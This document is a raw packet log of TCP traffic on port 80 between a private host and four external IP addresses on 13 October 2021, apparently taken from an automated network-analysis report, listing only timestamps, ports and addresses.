Oct 13, 2021 15:53:16.112725973 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.112751961 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.112765074 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.112782955 CEST	80	49851	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.112886906 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.112936974 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.112960100 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.113025904 CEST	49851	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.113040924 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.113059998 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.113066912 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.113082886 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.113096952 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.113117933 CEST	49851	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.113233089 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.113416910 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.123373985 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.123531103 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.123554945 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.123574972 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.123591900 CEST	80	49851	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.123733997 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.123747110 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.123823881 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.123908997 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.123969078 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.123991013 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124006033 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124021053 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124075890 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124089956 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.124180079 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124196053 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124267101 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.124341011 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124357939 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124372959 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124387980 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124439001 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.124469042 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124619007 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.124713898 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124731064 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.124794960 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.124970913 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.125148058 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.134356976 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.134387970 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.134584904 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.134622097 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.134700060 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.134718895 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.134805918 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.134907007 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.134983063 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135080099 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.135106087 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135171890 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135188103 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135202885 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135216951 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135261059 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.135361910 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135437012 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.135472059 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135543108 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135559082 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135574102 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135587931 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135602951 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135611057 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.135627985 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135643005 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135658026 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135790110 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.135968924 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.135993958 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.136142969 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.145291090 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.145410061 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.145595074 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.145746946 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.145787001 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.145802021 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.145821095 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.145971060 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.145989895 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146073103 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146089077 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146104097 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146150112 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.146292925 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.146336079 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146430016 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146445990 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146461010 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146528006 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146543980 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146646976 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.146701097 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146717072 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146828890 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.146914005 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.146931887 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.147106886 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.147129059 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.147144079 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.147157907 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.147172928 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.147187948 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.156663895 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.156694889 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.156893969 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.161777973 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.210266113 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.210488081 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.210489988 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.210510015 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.210700989 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.219923973 CEST	80	49851	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.219961882 CEST	80	49851	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.220288992 CEST	49851	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.220330954 CEST	49851	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.230936050 CEST	80	49851	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:21.228127003 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.323503971 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.323719025 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.325165987 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.325254917 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.325392962 CEST	49853	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.416029930 CEST	80	49853	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.416234970 CEST	49853	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.416311979 CEST	49853	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.420712948 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.420759916 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.420792103 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.421292067 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.421423912 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.421591043 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.506738901 CEST	80	49853	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.516586065 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.516664028 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.516879082 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.516957045 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.517002106 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.517056942 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.517160892 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.517196894 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.517232895 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.517369032 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.517483950 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.517596960 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.517714024 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.517900944 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.527144909 CEST	80	49853	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.527153969 CEST	80	49853	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.527683973 CEST	49853	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.527757883 CEST	49853	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.611926079 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.611934900 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.612107992 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.612118959 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.612267017 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.612278938 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.612377882 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.612385988 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.612456083 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.612498045 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.612505913 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.612631083 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.612674952 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.612714052 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.612812996 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.612874985 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.612982988 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.612989902 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.612991095 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.613110065 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.613158941 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.613204002 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.613306046 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.613452911 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.613576889 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.613701105 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.613867998 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.614021063 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.614145041 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.614151955 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.614392996 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.617583036 CEST	80	49853	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.706938028 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.707061052 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.707317114 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.707439899 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.707567930 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.707693100 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.707804918 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.707812071 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.707923889 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.708022118 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.708029032 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.757419109 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.774180889 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.774189949 CEST	80	49852	66.96.130.148	192.168.11.20
Oct 13, 2021 15:53:21.774507999 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:21.774518013 CEST	49852	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:53:26.540143013 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:26.694972992 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:26.695368052 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:26.696922064 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:26.851428032 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:26.851505041 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:26.851516008 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:26.851598978 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:26.851624966 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:26.851777077 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:26.851907015 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:26.851952076 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:26.852087021 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:26.852129936 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:26.852180004 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:26.852307081 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:26.852339029 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:26.852483988 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.005877972 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.005943060 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.006177902 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.006428003 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.006557941 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.006742954 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.006856918 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.007042885 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.007160902 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.007196903 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.007206917 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.007384062 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.007395029 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.007467031 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.007567883 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.007735968 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.007914066 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.008099079 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.160875082 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.160903931 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.161067009 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.161088943 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.161138058 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.161246061 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.161267996 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.161418915 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.161485910 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.161592007 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.161627054 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.161767960 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.161820889 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.161946058 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.161992073 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.162095070 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.162122965 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.162127972 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.162302971 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.162370920 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.162475109 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.162481070 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.162519932 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.162620068 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.162652016 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:27.162736893 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.163024902 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.164278984 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.164381981 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.164525032 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.164653063 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.164674997 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.165136099 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.165379047 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.165692091 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.165731907 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.315540075 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.315977097 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.315990925 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.316008091 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.316016912 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.316330910 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.316431999 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.317786932 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.318073034 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.318118095 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.318562984 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.468034983 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.468090057 CEST	80	49854	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:27.468369007 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:28.710607052 CEST	49854	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:28.711024046 CEST	49855	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:28.868635893 CEST	80	49855	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:28.868993998 CEST	49855	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:28.869091034 CEST	49855	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:29.026930094 CEST	80	49855	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:29.109446049 CEST	80	49855	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:29.109518051 CEST	80	49855	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:29.109813929 CEST	49855	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:30.882353067 CEST	49855	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:53:31.040029049 CEST	80	49855	192.64.116.180	192.168.11.20
Oct 13, 2021 15:53:35.896807909 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.047364950 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.047708988 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.049118042 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.049246073 CEST	49858	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.199408054 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.199459076 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.199657917 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.199810982 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.199825048 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.200000048 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.200109959 CEST	80	49858	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.200170040 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.200349092 CEST	49858	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.200520992 CEST	49858	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.350156069 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.350224972 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.350266933 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.350313902 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.350373983 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.350435972 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.350550890 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.350625038 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.350780964 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.350799084 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.350876093 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.350970030 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.351144075 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.351325989 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.351499081 CEST	49857	80	192.168.11.20	216.189.108.75
